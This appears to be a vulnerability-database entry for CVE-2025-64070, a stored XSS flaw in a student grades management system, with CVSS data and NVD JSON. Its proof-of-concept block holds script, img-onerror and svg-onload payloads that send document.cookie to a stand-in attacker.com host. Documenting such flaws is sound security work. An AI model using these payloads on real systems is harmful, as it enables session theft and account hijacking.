CVE-2025-64070

Description

Sourcecodester Student Grades Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the Add New Subject Description field.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:remyandrade:student_grades_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Sourcecodester Student Grades Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-64070 PoC - Stored XSS in Add New Subject Description -->
<!-- Login to Sourcecodester Student Grades Management System v1.0 -->
<!-- Navigate to Add New Subject functionality -->
<!-- Enter the following payload in the Description field: -->

<script>alert('XSS Vulnerability - CVE-2025-64070')</script>

<!-- Alternative payloads: -->
<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>

<!-- After submission, any user viewing the subject will trigger the XSS -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64070
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64070
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64070/
[4] VulDB https://vuldb.com/cve/CVE-2025-64070
[5] https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-64070
[6] https://www.linkedin.com/in/vabna-lina-24ab17186/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64070", "sourceIdentifier": "[email protected]", "published": "2025-12-02T17:16:06.113", "lastModified": "2025-12-03T20:13:03.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sourcecodester Student Grades Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the Add New Subject Description field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:student_grades_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3598B8C3-795C-4F26-9376-73D791CD287B"}]}]}], "references": [{"url": "https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-64070", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/vabna-lina-24ab17186/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}